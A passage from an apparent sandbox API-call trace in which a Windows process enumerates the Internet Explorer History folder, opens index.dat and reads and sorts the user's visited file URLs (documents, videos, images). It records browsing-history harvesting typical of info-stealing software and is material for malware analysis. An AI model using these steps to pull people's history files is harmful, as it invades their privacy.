_Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\" [0085.727] wcscat (in: _Dest=0x28a1f4, _Source="desktop.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" [0085.727] _wcsicmp (_String1="desktop.ini", _String2="index.dat") returned -5 [0085.728] FindNextFileW (in: hFindFile=0x58e868, lpFindFileData=0x289fa4 | out: lpFindFileData=0x289fa4) returned 1 [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.728] wcslen (_String="History.IE5") returned 0xb [0085.728] wcscpy (in: _Dest=0x28a1f4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.728] wcscat (in: _Dest=0x28a1f4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\" [0085.728] wcscat (in: _Dest=0x28a1f4, _Source="History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0085.728] wcscmp (_String1="History.IE5", _String2="..") returned 1 [0085.728] wcscmp (_String1="History.IE5", _String2=".") returned 1 [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcslen (_String="*.*") returned 0x3 [0085.728] wcscpy (in: _Dest=0x289320, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcscat (in: _Dest=0x289320, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0085.728] wcscat (in: _Dest=0x289320, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*" [0085.728] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*", lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 0x58e8a8 [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcslen (_String=".") returned 0x1 [0085.728] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0085.728] wcscat (in: _Dest=0x2897f8, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\." [0085.728] wcscmp (_String1=".", _String2="..") returned -1 [0085.728] wcscmp (_String1=".", _String2=".") returned 0 [0085.728] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0085.728] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 1 [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcslen (_String="..") returned 0x2 [0085.728] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0085.728] wcscat (in: _Dest=0x2897f8, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\.." [0085.728] wcscmp (_String1="..", _String2="..") returned 0 [0085.728] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0085.728] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 1 [0085.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.728] wcslen (_String="desktop.ini") returned 0xb [0085.728] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0085.729] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.729] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0085.729] wcscat (in: _Dest=0x2897f8, _Source="desktop.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" [0085.729] _wcsicmp (_String1="desktop.ini", _String2="index.dat") returned -5 [0085.729] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 1 [0085.729] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.729] wcslen (_String="index.dat") returned 0x9 [0085.729] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0085.729] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.729] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0085.729] wcscat (in: _Dest=0x2897f8, _Source="index.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" [0085.729] _wcsicmp (_String1="index.dat", _String2="index.dat") returned 0 [0085.729] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9c [0085.729] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.729] ReadFile (in: hFile=0x9c, lpBuffer=0x289278, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x282f40, lpOverlapped=0x0 | out: lpBuffer=0x289278*, lpNumberOfBytesRead=0x282f40*=0x20, lpOverlapped=0x0) returned 1 [0085.730] GetFileSize (in: hFile=0x9c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0085.730] SetFilePointer (in: hFile=0x9c, lDistanceToMove=20480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5000 [0085.730] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.730] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.730] SetFilePointer (in: hFile=0x9c, lDistanceToMove=20480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5000 [0085.730] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.730] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/Y9ZT5OXV0OoeQ.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png" [0085.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 69 [0085.730] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 0x44 [0085.730] SetFilePointer (in: hFile=0x9c, lDistanceToMove=20736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5100 [0085.730] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.730] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.730] SetFilePointer (in: hFile=0x9c, lDistanceToMove=20736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5100 [0085.730] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.730] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/UhCSZZxqQxRciV3_G.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp" [0085.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 105 [0085.730] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.730] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 0x68 [0085.731] SetFilePointer (in: hFile=0x9c, lDistanceToMove=20992, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5200 [0085.731] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.731] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.731] SetFilePointer (in: hFile=0x9c, lDistanceToMove=20992, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5200 [0085.731] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.731] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/YDkx2UOsAgxc.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv" [0085.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 59 [0085.731] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.731] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.731] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 0x3a [0085.731] SetFilePointer (in: hFile=0x9c, lDistanceToMove=21248, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5300 [0085.731] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.731] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.731] SetFilePointer (in: hFile=0x9c, lDistanceToMove=21248, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5300 [0085.731] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.731] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/d3L_N2j.doc" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc" [0085.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 95 [0085.731] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.731] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.731] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.731] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 0x5e [0085.731] SetFilePointer (in: hFile=0x9c, lDistanceToMove=21504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5400 [0085.731] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.731] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.731] SetFilePointer (in: hFile=0x9c, lDistanceToMove=21504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5400 [0085.731] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.732] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/F485kpxIwZE6mw85XH.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif" [0085.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 126 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.732] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 0x7d [0085.732] SetFilePointer (in: hFile=0x9c, lDistanceToMove=21888, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5580 [0085.732] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.732] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.732] SetFilePointer (in: hFile=0x9c, lDistanceToMove=21888, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5580 [0085.732] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.732] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/LwSAqUbPFkFK.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv" [0085.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 59 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.732] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 0x3a [0085.732] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22144, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5680 [0085.732] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.732] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.732] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22144, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5680 [0085.732] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.732] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/XZebUk9_OI5.xls" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls" [0085.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: 